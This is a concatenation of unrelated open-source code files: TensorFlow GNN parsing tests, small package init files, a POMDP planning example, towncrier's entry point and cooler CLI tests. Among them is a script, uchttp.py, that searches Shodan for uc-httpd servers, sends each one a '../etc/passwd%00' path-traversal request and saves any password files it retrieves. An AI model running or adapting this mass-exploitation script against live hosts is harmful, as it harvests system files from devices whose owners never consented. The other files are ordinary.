source: 'node.a'
target: 'node.b'
}
}
""",
examples=[
r"""
features {
}""", r"""
features {
feature {key: "edges/edge.#size" value {int64_list {value: [1] } } }
feature {key: "edges/edge.#source" value {int64_list {value: [0] } } }
feature {key: "edges/edge.#target" value {int64_list {value: [0] } } }
feature {key: "edges/edge.id" value {bytes_list {value: ['e.2.1'] } } }
}""", r"""
features {
feature {key: "edges/edge.#size" value {int64_list {value: [2] } } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1] } } }
feature {key: "edges/edge.#target" value {int64_list {value: [1, 0] } } }
feature {key: "edges/edge.id" value {bytes_list {value: ['e.3.1', 'e.3.2'] } } }
}"""
],
expected_value={
'id':
as_ragged([[], ['e.2.1'], ['e.3.1', 'e.3.2']]),
f'#adj:{gc.SOURCE}:node.a':
as_ragged([[], [0], [0, 1]], row_splits_dtype=tf.int32),
f'#adj:{gc.TARGET}:node.b':
as_ragged([[], [0], [1, 0]], row_splits_dtype=tf.int32),
'#size':
as_tensor([[0], [1], [2]]),
})
])
def testEdgeSetParsing(self, description: str, schema_pbtxt: str,
examples: List[str], expected_value: ResultValue):
schema_pb = pbtext.Merge(schema_pbtxt, schema_pb2.GraphSchema())
@tf.function
def result_map_fn(g: gt.GraphTensor):
edge = g.edge_sets['edge']
features = edge.get_features_dict()
features.update({'#size': edge.sizes})
features.update({
f'#adj:{tag}:{name}': index
for tag, (name, index) in edge.adjacency.get_indices_dict().items()
})
return features
self._test_all_cases(schema_pb, examples, expected_value, result_map_fn)
def _flatten_homogeneous_graph(graph: gt.GraphTensor) -> gc.Fields:
result = {}
for name, value in graph.context.features.items():
result[f'context/{name}'] = value
if graph.node_sets:
node_set = graph.node_sets['node']
for name, value in node_set.features.items():
result[f'node/{name}'] = value
result['node/#size'] = node_set.sizes
if graph.edge_sets:
edge_set = graph.edge_sets['edge']
for name, value in edge_set.features.items():
result[f'edge/{name}'] = value
result['edge/#size'] = edge_set.sizes
result['edge/#source'] = edge_set.adjacency[gc.SOURCE]
result['edge/#target'] = edge_set.adjacency[gc.TARGET]
return result
if __name__ == '__main__':
tf.test.main()
|
datamol/scaffold/__init__.py | hengwei-chan/fragmentation_and_assemble | 130 | 12717256 | <gh_stars>100-1000
from ._fuzzy import trim_side_chain
from ._fuzzy import fuzzy_scaffolding
|
examples/belief_mdp_example.py | david-abel/mdps | 230 | 12717274 | <reponame>david-abel/mdps
# Other imports.
from simple_rl.tasks.maze_1d.Maze1DPOMDPClass import Maze1DPOMDP
from simple_rl.pomdp.BeliefMDPClass import BeliefMDP
from simple_rl.planning.BeliefSparseSamplingClass import BeliefSparseSampling
def main():
pomdp = Maze1DPOMDP()
belief_mdp = BeliefMDP(pomdp)
bss = BeliefSparseSampling(gen_model=belief_mdp, gamma=0.6, tol=1.0, max_reward=1.0, state=belief_mdp.get_init_state())
scores, policies = bss.run(verbose=True)
if __name__ == "__main__":
main()
|
uc_http/uchttp.py | phiberoptick/My-Shodan-Scripts | 845 | 12717279 | #!/usr/bin/env python
#
# uc-http.py
# Search SHODAN for uc-http path traversial.
#
# Author: random_robbie
import shodan
import json
import requests
import sys
# Configuration
API_KEY = "YOURSHODANAPIKEY"
SEARCH_FOR = 'Server: uc-httpd 1.0.0'
session = requests.Session()
def grab_file (IP,PORT):
try:
print ("[*] Testing: "+IP+" on Port: "+PORT+" [*]")
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Content-Type":"application/x-www-form-urlencoded"}
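        # Traversal payload: the "../" segments climb out of the web root towards
        # /etc/passwd; the trailing %00 is presumably meant to defeat naive
        # path/extension checks on vulnerable uc-httpd builds.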
response = session.get("http://"+IP+":"+PORT+"/../../../../../../etc/passwd%00", headers=headers, timeout=15)
if 'root:' in response.text:
print ("[*]Got Password File ... Logging to file.[*]")
text_file = open("./found/"+IP+"passwd.txt", "a")
text_file.write(""+response.text+"\n")
text_file.close()
if '404 File Not Found' in response.text:
print ("[*] Not Vunerable. [*]")
except requests.exceptions.Timeout:
print ("[*] "+IP+" Timeout unable to connect [*]")
except Exception as e:
print('Error: %s' % e)
try:
# Setup the api
api = shodan.Shodan(API_KEY)
# Perform the search
result = api.search(SEARCH_FOR)
# Loop through the matches and print each IP
for service in result['matches']:
IP = str(service['ip_str'])
PORT = str(service['port'])
grab_file (IP,PORT)
except Exception as e:
print('Error: %s' % e)
sys.exit(1) |
src/towncrier/__main__.py | hawkowl/towncrier | 252 | 12717313 | <gh_stars>100-1000
from towncrier._shell import cli
cli()
|
tests/proj3/proj3/__init__.py | maphew/nimporter | 656 | 12717319 | from proj3.proj3 import foo, bar, baz
import proj3.lib3
|
tests/test_cli_fileops.py | mimakaev/cooler | 106 | 12717325 | from __future__ import absolute_import, division
import os.path as op
from click.testing import CliRunner
from cooler.cli import cli
testdir = op.realpath(op.dirname(__file__))
datadir = op.join(testdir, "data")
def test_cp():
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(
cli,
[
"cp",
op.join(datadir, "toy.symm.upper.2.cool"),
'test.cool',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"mv",
'test.cool',
'test2.cool::some/path',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ln",
'test2.cool::some/path',
'test2.cool::hard/link',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ln", "-s",
'test2.cool::some/path',
'test2.cool::soft/link',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ln", "-s",
'test2.cool::some/path',
'test3.cool::ext/link',
]
)
assert result.exit_code == 0
def test_list_coolers():
runner = CliRunner()
result = runner.invoke(
cli,
[
"ls",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ls", "-l",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
def test_tree():
runner = CliRunner()
result = runner.invoke(
cli,
[
"tree",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
def test_attrs():
runner = CliRunner()
result = runner.invoke(
cli,
[
"attrs",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
|